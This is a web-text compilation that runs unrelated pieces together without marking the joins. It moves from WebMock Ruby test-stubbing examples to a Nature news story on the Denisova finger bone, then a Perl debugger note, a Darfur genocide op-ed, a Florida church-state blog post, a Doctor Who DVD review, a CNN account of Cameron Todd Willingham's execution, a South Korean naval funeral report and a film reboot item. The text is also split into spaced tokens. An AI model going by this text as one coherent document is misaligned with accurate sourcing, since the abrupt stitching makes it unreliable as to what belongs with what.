stub_request ( : post , " www.google.com " ) . with ( : headers => { ' Content - Length ' => 3 } ) . to_return ( : body => " abc " ) # Actual request req = Net :: HTTP :: Post . new ( '/' ) req [ ' Content - Length ' ] = 3 Net :: HTTP . start ( ' http://www.google.com/' , 80 ) { | http | http .
request ( req , ' abc ' ) } # === >
Success assert_requested : post , " http://www.google.com " , : headers => { ' Content - Length ' => 3 } , :body => " abc " , : times => 1 # === > Success assert_not_requested : get , " http://www.something.com " # ===> Success
The same functionality in RSpec
stub_request ( : post , " www.google.com " ) . with ( : headers => { ' Content - Length ' => 3 } ) . to_return ( : body => " abc " ) # Actual request req = Net :: HTTP :: Post . new ( '/' ) req [ ' Content - Length ' ] = 3 Net :: HTTP . start ( ' http://www.google.com/' , 80 ) { | http | http .
request ( req , ' abc ' ) } # ===> Success WebMock .
should have_requested ( : get , " www.google.com " ) . with ( : body => " abc " , : headers => { ' Content - Length ' => 3 } ) . once # === > Success WebMock .
should_not have_requested ( : get , " www.something.com " ) # === >
Success
You can also choose the following syntax in RSpec :
stub_request ( : post , " www.google.com " ) . with ( : headers => { ' Content - Length ' => 3 } ) . to_return ( : body => " abc " ) # Actual request req = Net :: HTTP :: Post . new ( '/' ) req [ ' Content - Length ' ] = 3 Net :: HTTP . start ( ' http://www.google.com/' , 80 ) { | http | http .
request ( req , ' abc ' ) } # === >
Success request ( : post , " www.google.com " ) . with ( : body => " abc " , : headers => { ' Content - Length ' => 3 } ) . should have_been_made .
once request ( : get , " www.something.com " ) . should_not have_been_made # ===> Success
You can install it with
gem install webmock -- source http://gemcutter.org
Now in your test / test_helper.rb add the following lines :
require ' webmock/test_unit ' include WebMock
or if you use RSpec add these lines to spec/spec_helper.rb :
require ' webmock/rspec ' include WebMock
To find more usage example and information , check out WebMock on Github .
Published online 24 March 2010 | Nature 464 , 472-473 ( 2010 ) | doi:10.1038/464472a
News
DNA analysis reveals lost relative from 40,000 years ago .
In the summer of 2008 , Russian researchers dug up a sliver of human finger bone from an isolated Siberian cave .
The team stored it away for later testing , assuming that the nondescript fragment came from one of the Neanderthals who left a welter of tools in the cave between 30,000 and 48,000 years ago .
Nothing about the bone shard seemed extraordinary .
A finger bone found in Denisova Cave in Siberia could add a branch to the human family tree .
B. VIOLA
Its genetic material told another story .
When German researchers extracted and sequenced DNA from the fossil , they found that it did not match that of Neanderthals — or of modern humans , which were also living nearby at the time .
The genetic data , published online in Nature1 , reveal that the bone may belong to a previously unrecognized , extinct human species that migrated out of Africa long before our known relatives .
" This really surpassed our hopes , " says Svante Pääbo , senior author on the international study and director of evolutionary genetics at the Max Planck Institute for Evolutionary Anthropology in Leipzig , Germany .
" I almost could not believe it .
It sounded too fantastic to be true . "
Researchers not involved in the work applauded the findings but cautioned against drawing too many conclusions from a single study .
" With the data in hand , you cannot claim the discovery of a new species , " says Eske Willerslev , an evolutionary biologist and director of the Centre for GeoGenetics at the University of Copenhagen .
“ I almost could not believe it .
It sounded too fantastic to be true . ”
If further work does support the initial conclusions , the discovery would mark the first time that an extinct human relative had been identified by DNA analysis .
It would also suggest that ice - age humans were more diverse than had been thought .
Since the late nineteenth century , researchers have known that two species of Homo — Neanderthals and modern humans — coexisted during the later part of the last ice age .
In 2003 , a third species , Homo floresiensis , was discovered on the island of Flores in Indonesia , but there has been no sign of this tiny ' hobbit ' elsewhere .
The relative identified in Siberia , however , raises the possibility that several Homo species ranged across Europe and Asia , overlapping with the direct ancestors of modern people .
The Siberian site in the Altai Mountains , called Denisova Cave , was already known as a rich source of Mousterian and Levallois artefacts , two styles of tool attributed to Neanderthals .
For more than a decade , Russian scientists from the Institute of Archaeology and Ethnology in Novosibirsk have been searching for the toolmakers ' bones .
They discovered several bone specimens , handling each potentially important new find with gloves to prevent contamination with modern human DNA .
The bones ' own DNA could then be extracted and analysed .
When the finger bone was discovered , " we did n't pay special attention to it " , says archaeologist Michael Shunkov of the Novosibirsk institute .
But Pääbo had established a relationship with the Russian team years before to gather material for genetic testing from ice - age humans .
After obtaining the bone , the German team extracted the bone 's genetic material and sequenced its mitochondrial DNA ( mtDNA ) — the most abundant kind of DNA and the best bet for getting an undegraded sequence from ancient tissue .
After re-reading the mtDNA sequences an average of 156 times each to ensure accuracy , the researchers compared them with the mtDNA genomes of 54 modern humans , a 30,000 - year - old modern human found in Russia and six Neanderthals .
The Denisova Cave DNA fell into a class of its own .
Although a Neanderthal mtDNA genome differs from that of Homo sapiens at 202 nucleotide positions on average , the Denisova Cave sample differed at an average of 385 positions .
The differences imply that the Siberian ancestor branched off from the human family tree a million years ago , well before the split between modern humans and Neanderthals .
If so , the proposed species must have left Africa in a previously unknown migration , between that of Homo erectus 1.9 million years ago and that of the Neanderthal ancestor Homo heidelbergensis , 300,000 to 500,000 years ago .
Study author Johannes Krause , also at the Max Planck Institute in Leipzig , says that the researchers are now generating nuclear DNA sequences from the bone with the hope of sequencing its entire genome .
If they are successful , it would be the oldest human genome sequenced , eclipsing that of the 4,000 - year - old Eskimo from Greenland that Willerslev and his colleagues reported last month2 .
A complete genome might also enable the researchers to give the proposed new species a formal name .
They had originally planned to do so on the basis of the mtDNA genome .
But they opted to wait until more bones are found — or until the DNA gives a clearer picture of its relationship to modern humans and Neanderthals .
Willerslev emphasizes that , on its own , the mtDNA evidence does not verify that the Siberian find represents a new species because mtDNA is inherited only from the mother .
It is possible that some modern humans or Neanderthals living in Siberia 40,000 years ago had unusual mtDNA , which may have come from earlier interbreeding among H. erectus , Neanderthals , archaic modern humans or another , unknown species of Homo .
Only probes of the nuclear DNA will properly define the position of the Siberian relative in the human family tree .
ADVERTISEMENT
Anthropologists also want to see more - refined dating of the sediments and a better description of the finger bone itself .
" I have n't seen a picture of the bone , and would like to , " says Owen Lovejoy , an anthropologist at Kent State University in Ohio .
" The stratigraphic age for the bone is 30,000 to 48,000 years old , but the mtDNA age could be as old as H. erectus , " says Lovejoy .
" That does n't tell us much about human evolution unless it truly represents a surviving ancient species . "
The cave has yielded few clues about the culture of the Siberian hominin , although a fragment of a polished bracelet with a drilled hole was found earlier in the same layer that yielded the bone3 .
Pääbo suspects that other human ancestors — and new mysteries — may emerge as geneticists grind up more ancient bones for sequencing .
" It is fascinating that molecular studies make a contribution in palaeontology where there is little or no morphology preserved , " he says .
" It is clear we stand just in the beginning of many fascinating developments . "
I recently blogged about extending the Perl debugger .
Basically , if you use xx $ some_var , you get love Data : : Dumper output instead of the confusing debugger output :
DB < 2 > xx $ shiny { foo => [ 1 , 2 , 4 ] , guess => sub { my $x = shift @_ ; return $ x + 1 ; } , this => " that " , uno => { this => " that " , " what ? " => { this => " them " } } }
You can fork it on github and clean up my awful code or install it from the CPAN when it 's available .
In other news , if you ever extend the debugger , your code is going to look awful by default because there is just no way to get around that mess of global variables and action at a distance .
Most governments do n’t acknowledge it .
The Sudanese president dismisses it .
Darfurians demand that it be recognized .
Academics , activists , and lawyers dispute whether it is still occurring or whether it occurred at all .
International Criminal Court ( ICC ) judges debate standards of evidence surrounding it .
The nature of recent attacks this past week by Sudanese government forces and militia allies against defenseless civilians potentially augurs its resurgence .
And if a fledgling peace process continues to move forward , then any evidence of it ever happening may well be swept under the rug .
The “ it ” in question is Darfur ’s genocide .
Seven years after a small rebellion in western Sudan by Darfurian insurgents unleashed a massive counter - insurgency strategy by the Sudanese government and its Janjaweed militia allies , the debate continues :
What should be done about the genocide ?
How can justice and peace simultaneously be pursued ?
The ICC ’s recent ruling that genocide charges against Sudanese President Omar al - Bashir are possible gives new life to the issue .
And responding to a YouTube question posed by the Enough Project , President Obama appeared to reverse his administration ’s stated policy of an “ ongoing genocide ” by referring to it in the past tense .
How do we make sense out of all this ?
In our eight trips into Darfur over these past seven years , we have never met a Darfurian who does not believe genocide has occurred .
But genocide is ultimately the subject of international law .
The Genocide Convention states that the crime pertains when a party intends to destroy – in whole or in part – a particular group of people based on their identity .
Although judges will ultimately rule on this , we believe the evidence for genocidal intent is there .
Eyewitness reports this past week of aerial bombardment of villages followed by attacks on civilians populations by armed horsemen echo back to a period just a few years ago when much of Darfur was literally on fire .
These reports are emerging simultaneous to a series of framework ceasefire agreements , thus complicating the Darfur landscape further .
What we do know , though , is that these recent attacks and their aftermath reinforce a disturbing trend : evidence of the human rights crimes that have been and are being committed is being concealed and compromised .
The ruling party in Sudan responsible for the bulk of the crimes in Darfur is covering up the evidence for previous and ongoing human rights crimes in five unique ways .
The international community must act now – in the context of peacemaking efforts – to blow the lid off this elaborate and deadly cover-up .
First , most of the aid agencies that were thrown out last year by President Bashir were working quietly to support survivors of sexual violence and to protect thousands of women and girls from rape .
One of the principal tools of war in Darfur has been systematic rape , a factor in any argument supporting the existence of genocidal intent .
By removing most of the groups that were protecting or caring for rape survivors , the cover up is on .
Second , the Khartoum regime has systematically denied access to the United Nations / African Union observer mission to investigate attacks on civilians , so many of these attacks go unreported and the culpability remains mysterious .
The observer mission has had no access to the areas of recent government attacks , and thus the UN mission has been totally silent in the face of major attacks .
What is the role of this hugely expensive mission if not to observe and report ?
Denial of access is part of the Khartoum regime ’s ongoing cover - up of new crimes , so the false argument can be strengthened that rights violations in Darfur are a thing of the past .
Third , there continue to be humanitarian black spots , areas where aid agencies simply can’t go , such as the areas affect by this week ’s fighting , leaving over a third of Darfur unreached by food and medical aid .
We do n’t know the scale or scope of this problem , but we do know that when access is denied or when aid agencies are expelled , people are much more at risk of disease or malnutrition , which have been by far the biggest killers in Darfur .
Fourth , Khartoum has systematically denied access to journalists and human rights investigators , and repressed independent Darfurian civil society groups , thus robbing us of another means of independently ascertaining what is happening today in Darfur , or gathering evidence about past crimes .
Illustratively , there is a total media blackout of the attacks being undertaken now in Darfur .
Fifth , the Bashir administration has intimidated aid agencies and UN bodies so no independent information gets released about human rights issues , because to do so would mean certain expulsion for the responsible organization .
So when the word genocide gets raised and debated , we would make a plea to spotlight what is happening now to cover up the human rights crimes that have been and are being committed , losing the evidence to the vast sands of the Sahara Desert .
We also hope that debate can eventually fixate on how to integrate the need for justice into more intensive peace - making efforts in both Darfur and southern Sudan .
For peace to have a chance , peace efforts must be leveraged with real consequences for crimes against humanity , whether they are called genocide or not .
John Prendergast is cofounder of Enough , the project to end genocide and crimes against humanity at the Center for American Progress .
He is the author with Don Cheadle of the forthcoming book , “ The Enough Moment . ”
Omer Ismail is senior adviser to Enough and also serves as vice president for advocacy at Darfur Peace and Development .
---
Follow us on Twitter and Facebook .
This is what Jeb Bush and the Florida Republicans want .
Tallahassee — Separation of church and state is a celebrated American principle , but Republican lawmakers say Florida has too much of it .
The Florida Senate 's Education PreK - 12 Committee approved a constitutional amendment proposal Tuesday that would repeal a century - old ban on public funding of religious organizations .
The 6 - 2 vote fell along party lines .
It is being pitched as the " religious freedom " bill by Republican leaders .
The measure would strike from the Constitution : " No revenue of the state or any political subdivision or agency thereof shall ever be taken from the public treasury directly or indirectly in aid of any church , sect , or religious denomination . "
It would add : " An individual may not be barred from participating in any public program because that individual has freely chosen to use his or her program benefits at a religious provider . "
Hoo boy .
These guys are something else .
They snuck that through yesterday while we were all protesting Senate Bill 6 .
Here I am fighting for my life against a law that will destroy everything I have worked for , and they bring the right hook from the blindside .
I do n't know what to do .
I want to continue fighting .
I want to become a force that they cannot deny .
Here at Daily Kos our Teachers Movement was honored by holding two of the Top Thirty spots on the Weekly Impact chart , so I know there is support for our cause .
I do n't want that momentum to stop .
I am inspired by the Chris Bowers article that Meteor Blades put on the front page .
I think I can do this .
No matter who you are , if you want to make a difference in politics , then you persuade people to join you in a cause .
Once you do that , then you convince them to take a collective action on behalf of that cause ( even if that action is just voting ) .
And then , most importantly , if that actions ends up making a difference on behalf of that cause , then you will probably be more persuasive and convincing in the future .
That 's it .
There is no great strategy to be unearthed .
There is no secret that everyone else working in politics has missed .
It 's just persuasion and organizing .
So I guess the question becomes " How ? "
How do I forge an effective political force from the oppression that the Florida Republican legislature is imposing on the will of its people ?
I write pretty well .
One thing I can do is continue my daily diaries here on Daily Kos .
I could even take requests , if this mess in Florida ever gets settled .
I have three blogs that I have set up , but none of them are political .
One is from my classes .
That got us a partnership with the Miami Dolphins football team .
One is for a trading card game I like .
Just a hobby , but rather obsessive and I like the look of it .
One is for my life and my art .
That 's just me .
So I guess I have the skills to start persuading and organizing .
I have a paypal account to collect donations .
I have the will , and I know there is a way .
Any suggestions ?
I need all the advice I can get .
Last week , Doctor
Who 's most fearsome cybernetic enemies invaded the DVD shelves in greater strength than ever before .
The " Dalek War " DVD box set and a new edition of " Remembrance Of The Daleks " both appeared .
But are they worth it ?
Advertisement
Those of us who survived the Dalek War do n't like to talk about it .
It 's one of those things that you either know about , or you do n't .
You 'll see us huddling under our blankets and twitching slightly whenever a rolly bin goes by or a Roomba starts vacuuming near us .
Some of us are so traumatized , we can't even stand to hear about exfoliation because it sounds too much like exterminaton — and thus , we have terrible skin .
And the worst thing ?
Nobody even knows the Dalek War even happened , because it 's been erased from the history books .
Actually , there is no Doctor Who story called " Dalek War , " of course .
Instead , the " Dalek War " box set consists of two linked Jon Pertwee stories , " Frontier In Space " and " Planet Of The Daleks . "
The title of the box set might seem engineered to make fans think that they 're getting the backstory of the " Time War , " in which the Doctor destroyed the Daleks along with his own home planet .
Advertisement
And in fact , you could make a pretty strong case that these newly released DVDs do show some hints of how the Time War came about , along with the previously released " Genesis Of The Daleks . "
In " Planet Of The Daleks , " the Time Lords send the Doctor to thwart the Daleks ' biggest , and maddest , scheme of universal conquest .
( Just like in " Genesis , " they send the Doctor back in time to avert the Daleks ' creation altogether . )
And in " Remembrance , " the Doctor uses ancient Time Lord technology to deal a very serious blow indeed to the Daleks .
You can see how the Daleks might be a tad pissed about all this Time Lord muckery in their business , and launch a war against the unelected demigods of the universe .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
So .
Are these DVDs worth getting ?
It 's a question worth asking , since the " Time War " DVD set consists of two Jon Pertwee six - parters , and it 's almost a universal law that Pertwee six - parters are boring and over - padded .
And " Remembrance Of The Daleks " already came out on DVD , several years ago — this new release is an expanded " special edition , " with a newly restored video and sound , and new features .
But nevertheless , these new releases are pretty worthwhile .
The two Pertwee stories are definitely overpadded , especially " Frontier In Space . "
Here 's the original back cover blurb for the novelization of " Frontier In Space , " called Doctor Who And The Space War :
` Doctor ' screamed Jo. `Look at that thing .
It 's coming straight at us ! '
A small black spaceship , about a mile away , was approaching rapidly .
It had no lights , no markings .
But some instinct told Jo that the tiny craft meant danger .
The year is 2540 , and two powers loom large in the Galaxy – Earth and Draconia .
After years of peace , their spaceships are now being mysteriously attacked and cargoes rifled .
Each suspects the other and full scale war seems unavoidable .
The Doctor , accused of being a Draconian spy , is thrown into prison .
And only when the MASTER appears on the scene do things really begin to move ...
Advertisement
You know there 's a problem when the book cover itself tells you that the story does n't " begin to move " until the Master shows up .
And unfortunately , that means nearly three episodes of the story not moving — during which the Doctor and Jo get captured and escape , over and over .
( There 's also a fair amount of getting captured and escaping after the Master shows up , too . )
But " Frontier In Space " is worth checking out for a few reasons , anyway .
It 's the last story featuring the original Master , played by Roger Delgado , due to his death in a car accident afterwards .
It 's one of the original series ' few attempts at a huge space opera , along with 1969 's " The Space Pirates . "
The Draconians are one of the greatest alien races Doctor Who ever featured .
( They 're like TNG - era Klingons , except reptillian .
And sexist . )
And the cool parts , in between the dreadful stretches of wheel - spinning , are great .
And , of course , the Daleks turn up at some point , to set up the continuation in " Planet Of The Daleks . "
And " Planet Of The Daleks " is basically pure delicious cheese .
Creator Terry Nation returns to the Daleks after something like seven years away , and throws every silly idea he can think of into one story .
The Daleks can turn invisible , except that they never do .
The planet Spiridon is a hot jungle world with a core of " molten ice . "
There are deadly fungi and the Daleks have an unstoppable biological weapon .
And on and on .
Unlike the somewhat sluggish " Frontier In Space , " " Planet " throws in a new ridiculous idea approximately every twenty minutes or so .
Can we have an icecano ?
Why not ?
It 's like all of those loopy 1970s Dalek Annuals are finally brought to life as a full - fledged Doctor Who story .
Advertisement
And there are the sequences where everybody in the cast dresses in purple fake fur , like ravers :
A DVD of " Planet Of The Daleks " is a must - have for fans , because the story 's third episode was only available in black and white , until it was restored to color for this release .
And the color restoration really does look fantastic , thanks to a complex restoration process .
Not only is it great to see the whole story in color , but this episode was frequently edited out when the story was shown on PBS in the United States .
( No , really .
They would just jump from episode two to episode four with no explanation .
Also , at least one PBS station used to show the black - and - white episode three , but then inexplicably skip episode six , which was available in color . )
Advertisement
Meanwhile , " Remembrance Of The Daleks " showcases everything that was great and everything that was terrible about the final years of Doctor Who .
You have Sylvester McCoy gurning and clowning as if the fate of the universe depends on extreme silliness , and yet he gets to have a few moments of tremendous darkness — and the Doctor is a proactive mastermind instead of a passive victim for the first time in years .
The Daleks wobble and look silly , but they also get a few fuck - yeah moments .
The plot makes no sense whatsoever , but it 's also extremely cool .
( Seriously , the Doctor could do at the start of the story what he does at the end of it , with no loss of human life whatsoever .
Why does n't he ? )
Advertisement
" Remembrance " is especially notable for a couple of reasons :
Ace , the Doctor 's then - new companion , comes into her own as a baseball - bat - wielding , explosives - tossing bad - ass , the first really memorable companion since Romana .
And the show starts trying to work more complex themes into its storytelling once again , including some real darkness , in a way that foreshadows Russell T. Davies ' more successful ( in every sense ) 2005 relaunch .
As usual with the Doctor Who DVDs , the extras are a bit hit and miss .
The " Dalek War " box set comes with a bunch of featurettes , in which genuinely interesting factoids are interspersed with actors talking about how lovely the other actors were , and how lovely the director was .
Simply lovely , darling .
The " Frontier In Space " one is made awesome by the quick behind - the - scenes glimpses of the show 's huge model effects being done , and visual effects expert Mat Irvine explaining how he created one spaceship in a hurry using a ping - pong ball and some odds and ends .
There are " Stripped For Action " featurettes about the Third Doctor 's comic strips and the Dalek comic strips , which are pretty fun if you 've read those comics .
" Frontier " also includes a lovely , if overlong , retrospective on Roger Delgado 's career .
And there are two inexplicable and bland " Perfect Scenario " playlets , in which someone in the future watches Doctor Who .
Or something .
Advertisement
There is some great discussion of the bizarre costumes in " Frontier , " including some truly epic collars :
One fascinating thing you discover from the " Dalek War " featurettes is the secret relationship between Doctor Who and Space : 1999 / Thunderbirds creator Gerry Anderson .
In the featurette on Dalek comic strips , Anderson talks about how the Daleks struck him with envy , and he was determined to publish Dalek strips in his new magazine , Century 21 .
And then we discover that most of the spaceship models in " Frontier In Space " were cast - offs from old Gerry Anderson productions , refitted slightly for use in Doctor Who .
In fact , Who would n't have chosen to tackle the difficult space - opera genre if it had n't had access to a storeroom full of old Anderson models .
Meanwhile , if you already own the " Remembrance Of The Daleks " regular DVD , the extras are the main reason to buy the new release , along with the newly improved video quality .
Are the extras worth it ?
Well , maybe .
The " making of " featurette is pretty great , and much better than the similar featurettes on the " Dalek War " set .
Writer Ben Aaronovitch and script editor Andrew Cartmel talk about the political subtext in the story , and marvel at the serial 's relatively high budget .
There 's some nice making - of footage , including the hilarious bits where Simon Williams flinches every time his gun goes off .
And dodgy though the effects look , you 'll gain a new appreciation for how ingeniously devised many of them were .
There are the same deleted scenes and outtakes , but this time they 're introduced by Sylvester McCoy and Sophie Aldred , and once again you can select different viewing angles for Ace 's crucial battle with a Dalek .
Less interesting is a 16 - minute featurette where Aaronovitch and Cartmel list every other Doctor Who story namechecked in this one .
The most annoying thing , though , is that the new " Remembrance " DVDs are a two - disc set , and the second disc consists of only one item : a half - hour documentary about the Daleks ' creator , Davros , that draws extensively on some Big Finish audio dramas .
The Davros documentary could easily have been left off the DVDs , and then the whole thing could have fit on one disc .
Especially since the BBC is asking us to buy " Remembrance " a second time to get new features , charging for a two - disc set when the second disc is pretty disposable seems kind of mean .
Advertisement
So to sum up : " Dalek War " is a nice piece of classic Doctor Who , with twelve episodes of space adventure and Dalek mayhem .
Despite being a bit slow in places , it 's worth seeing for Jon Pertwee , the Master and the Daleks in their element .
The new " Remembrance Of The Daleks " DVD is a must - have if you do n't already have the 2001 edition .
If you do have the original release , it really depends on how much you want a somewhat improved picture and sound quality , and some interesting retrospectives on the story 's creation .
Ardmore , Oklahoma ( CNN ) -- Cameron Todd Willingham 's family here in Oklahoma never believed he set the fire that killed his three daughters .
" We could not even imagine it , " his cousin , Patricia Cox , recounted recently .
" That was completely ludicrous to us . "
But 16 days after the fire , Willingham was arrested .
And within a year , he was on death row .
On February 17 , 2004 , he was strapped to a gurney in a Texas prison and given a lethal injection , proclaiming his innocence to the end .
The story of how Willingham -- Todd , to his family -- went from a home on a shady street in Ardmore to the death chamber is a tale of science and skull tattoos , of last - minute hopes raised and dashed .
It is a story wrapped up in allegations that the governor who let the execution go forward is now trying to derail an investigation into whether Texas put an innocent man to death .
And in Ardmore , where Willingham 's baby shoes still sit on a desk in the house where he grew up , the family that fought to save his life is still trying to clear his name .
" It 's not over , " Cox 's sister , Judy Cavnar , said .
" This is a long way from being over . "
The fire started about 10 a.m. on December 23 , 1991 .
Willingham , then 23 , was asleep in the wood - frame home in Corsiana , Texas , that he shared with his wife and children .
Stacy had gone out to buy presents for 2 - year - old Amber Kuykendall and the 1 - year - old twins , Karmon and Kameron Willingham .
Money was tight
Times were tough for the couple .
Todd , who 'd worked as a mechanic , at an auto - parts store and for a glass company , was unemployed and the couple was behind on bills .
Willingham told investigators that Amber woke him up when the fire broke out , and he told her to get out of the house .
He said he then crawled on the floor into the children 's room to find the twins , but failed .
Christmas was spent making funeral arrangements .
Stacy 's family blamed Todd for the children 's deaths " because he could n't get them out , " said his stepmother , Eugenia Willingham .
" There was so much friction in the air . "
People in Corsicana took up a collection to help the family .
Donations helped pay for gravestones and a plot in an old cemetery downtown .
But to police , the grieving father was starting to look like a murderer .
He told different stories about how he escaped the fire .
He said he thought Amber was in the children 's room , which had a baby gate at the door , but her body was found on his and Stacy 's bed .
His injuries did n't match what he told investigators about his efforts to rescue the girls .
Witnesses at the scene said Willingham would n't go back into the house once he escaped , but took care to move his car away from the burning home .
" The actions he took were not the actions of someone with a kid burning up and him right outside , " said Sgt. Jimmie Hensley , the lead investigator for Corsicana police .
Despite Willingham 's complaints about a faulty microwave and squirrels in the attic , firefighters found no sign of electrical issues that might have caused the fire .
A space heater in the children 's bedroom was off , and the gas line that fed it had no signs of a leak .
But they did find burn patterns on the walls and floor that were considered signs some sort of flammable liquid was used to start the blaze , as well as patterns of cracked glass that were considered a sign of arson .
Meanwhile , detectives began to hear about Todd 's fights with Stacy , including claims he once beat her in order to cause a miscarriage .
Police said he told his mother - in - law that he believed he would be blamed for the deaths because of " unusual marks " on Amber 's neck .
Willingham was arrested January 8 , 1992 , the day before his 24th birthday .
He told his stepmother , " I do n't have a chance down here . "
' He did n't go quietly '
Todd was an outsider in Corsicana , a town about 60 miles south of Dallas .
Stacy 's family had deep roots there , and he'd moved there to be with her after a stretch in an Oklahoma boot camp for a probation violation .
As a teenager , Todd had started huffing paint and dropped out of school .
He 'd been on probation for burglary , theft and driving under the influence and did a few days in a county jail for carrying a concealed weapon .
" He was certainly defiant and rebellious , as teenagers sometimes are in high school , " Cox said .
But his probation officer " took a special interest in him .
I think she saw in him , too , that he was a child of inopportunity . "
Todd 's father , Gene , ran an auto salvage yard in Ardmore , an oil patch town with a sharp line between rich and poor .
He took custody of the 13 - month - old boy after his ex-wife abandoned him as an infant , and he and Eugenia raised him .
Eugenia Willingham acknowledges that Todd and Stacy had a " stormy " relationship , and that Todd told differing stories in the days after the fire .
But she added , " I do n't think he really knew what he did .
I 'm sure he was in shock . "
And before his execution , he admitted he had n't gone back inside after his first attempt to find the children .
" He just did n't want people to think he did n't try , " she said .
" Of course , they thought that anyway . "
Willingham 's August 1992 trial lasted three days .
Prosecutors had offered him a chance to plead guilty in exchange for a life sentence , but he refused .
The Willingham family raised money for his attorneys and for a new suit for the trial , only to hear prosecutors mock Todd as " a baby - killer dressed up like a lawyer , " Eugenia said .
Witnesses called him a " sociopath " incapable of rehabilitation and suggested the tattoo of a skull on his left shoulder , combined with his fondness for heavy - metal bands like Iron Maiden , indicated a bent toward Satanism -- a claim that still rubs the family raw .
Quick verdict
The jury took less than an hour to find him guilty of capital murder .
Eleven and a half years later , his appeals exhausted and pleas for clemency denied , he was headed for the death chamber .
His relatives last saw him less than an hour before the execution .
" He told us he had 55 minutes until he'd be a free man , " Cavnar said .
But when a prison doctor came to check on him , Todd told him , " I 'm not going to die on you .
You 're going to have to kill me . "
After the execution , a prison chaplain told the family , " Todd went , but he did n't go quietly . "
Stacy was the only one of his relatives to view his death .
Though she stood by him during the trial , forcing prosecutors to question her as a hostile witness , she filed for divorce soon after he went to death row .
Eventually , Willingham 's family said , she came to believe he was guilty -- and as his execution drew near , she refused to allow him to be buried alongside the children .
Witnesses said Todd died cursing her , saying he hoped she would " rot in hell . "
" I am an innocent man , " he declared , " convicted of a crime I did not commit .
I have been persecuted for 12 years for something I did not do . "
His body was cremated .
Despite Stacy 's wishes , his family snuck into Corsicana to scatter some of his ashes on the girls ' graves .
" We were n't in the cemetery 10 minutes before everyone knew it , " Eugenia Willingham said .
Efforts to reach Willingham 's ex-wife for this story were unsuccessful .
But in a statement issued to the Fort Worth Star - Telegram in October , she said Willingham confessed to killing the girls during a visit about two weeks before his execution .
" He said if I did n't have my girls I could n't leave him and that I could never have Amber or the twins with anyone else but him , " her statement reads .
" He told me he was sorry and that he hoped that I could forgive him one day . "
She had never reported that confession before , and told the Corsicana Daily Sun in 2004 that her ex-husband was sticking to his account of the fire .
And Willingham 's family disputes the account , his stepmother said .
Cox said the Willinghams have tried to be sensitive to Stacy 's family -- but " there 's a loss up here not of three lives , but four . "
Governor 's shakeup draws new scrutiny
In the years between Willingham 's trial and execution , Cox tried to get television crime shows interested in her cousin 's case .
One show , in 2002 , featured Gerald Hurst , a chemist and explosives expert in Austin , Texas .
" All I had was a town , " she said .
" So I got on the Internet and I sent six letters out to attorneys who handled arson cases . "
One of those lawyers responded with a phone number for Hurst , but Cox said no one answered when she called -- " Not even voice mail . "
But Todd still had appeals , and it " was n't critical , " she added .
After several more unsuccessful efforts , she moved on .
By late 2003 , it was critical .
The U.S. Supreme Court refused the last of his appeals .
His execution date was set for February 2004 .
Cox had started lobbying the governor 's office for a reprieve , and she decided to make one " last desperate attempt " to reach Hurst in early January 2004 .
" I just simply picked up the phone again , and he actually answered .
I could n't believe it .
I think I was speechless . "
With just weeks remaining before the execution , Hurst agreed to look into the case .
He concluded that the indicators investigators pointed to as evidence of arson had been rendered obsolete since 1991 , and " would be considered invalid in light of current knowledge . "
The family was elated by the report .
But , Cox said , " It got better before it got worse . "
Hurst 's report went to the state Court of Criminal Appeals .
In a two - page order the day of Willingham 's execution , it ruled the report " does not meet the requirements for consideration " as new evidence of innocence .
It also went to the state Board of Pardons and Paroles , which denied a request for clemency , and to Gov. Rick Perry , who could grant only a 30 - day stay of execution without the parole board 's authorization .
None moved to stop Todd 's execution .
" We just ran out of time , " Cox said .
" Todd ran out of time .
We all ran out of time . "
Innocence Project weighs in
But since 2004 , two more reports have backed up Hurst 's findings .
The first was delivered in 2006 by the Innocence Project , which seeks to clear prison inmates it believes were wrongly convicted .
That led the Texas Forensic Science Commission to mount its own investigation .
The commission hired Craig Beyler , chairman of the International Association for Fire Safety Science , to review the evidence against Willingham .
And Beyler 's report , filed in August , determined that the finding of arson in the Willingham fire " could not be sustained . "
The investigators who testified the fire was deliberately set " had poor understandings of fire science and failed to acknowledge or apply the contemporaneous understanding of the limitations of fire indicators , " it states .
In a 21 - page rebuttal , the Corsicana Fire Department says it stands by its original conclusions .
Hensley dismissed the reviews as " Monday - morning quarterbacking " by experts unfamiliar with all the evidence .
" I 'm firmly a believer that justice was served , " Hensley said .
But opponents of capital punishment say the Beyler report has brought Texas eyeball - to - eyeball with the uncomfortable prospect of admitting it had put an innocent man to death .
And they say Perry -- a Republican facing a tough primary challenge in March -- blinked .
Report to Texas Forensic Science Commission |
Fire department response ( PDFs )
Shake - up stalls probe
Two days before the Forensic Science Commission was to question Beyler in a public forum , the governor replaced its chairman and two other members whose terms were up .
That forced the commission to delay the hearing so new members could read up on the case , and no new date has been set .
Perry has since replaced a third member of the commission .
The governor defended the replacements as routine , and says he remains confident of Willingham 's guilt .
He told reporters in October that Willingham was a " monster " whose conviction was upheld repeatedly by the courts .
But the shakeup has become an issue in his re-election campaign , and a state Senate committee has a hearing scheduled Tuesday to question the Forensic Science Commission 's new chairman about his plans for the case .
" I want a status report , " state Sen . John Whitmire , D - Houston , the chairman of the Senate Criminal Justice Committee .
" He 's been there a month . "
Back in Ardmore , the Willingham family has learned some hard lessons .
One is that there 's a legal system in America -- " not necessarily a justice system , " Cavnar said .
Now that the Texas investigation is in limbo , Cox said she 's choosing her words carefully .
The investigation " meant everything to us , " she said .
" We 're a little fearful that it 's not going to happen . "
But she said they 're still determined to press the issue -- not just for Todd , but for others on death row who might be in the same circumstance .
Said Cox : " If you do n't think it can happen to you , you 're wrong . "
SEOUL , South Korea —
The South Korean military vowed revenge without identifying a target as the country gave an emotional farewell on Thursday to the sailors killed when their ship sank last month near a disputed sea border with North Korea .
If the ship is found to have been torpedoed by North Korea , as many South Koreans suspect , it will amount to one of the most serious provocations from the North in recent decades .
Seoul has repeatedly vowed “ stern countermeasures ” but has shied from publicly discussing its options until an investigation is over .
Military retaliation , however , is unlikely , analysts say .
“ We ’ll never forgive whoever inflicted this great pain on us , ” said the navy chief of staff , Kim Sung - chan , at a mass funeral for the victims on Thursday in the port city of Pyeongtaek , about 45 miles south of Seoul , home of the ship ’s naval base .
“ We will track them down to the end and we will , by all means , make them pay for this . ”
Sirens wailed , flags flew at half - staff and navy ships sounded whistles as South Korea honored the 40 sailors known to have died and 6 others who are missing and presumed dead .
EXCLUSIVE : 20th Century Fox is going Commando again , setting David Ayer to write and direct a reboot of the 1985 film that became one of the building blocks that transformed Arnold Schwarzenegger from bodybuilder to superstar .
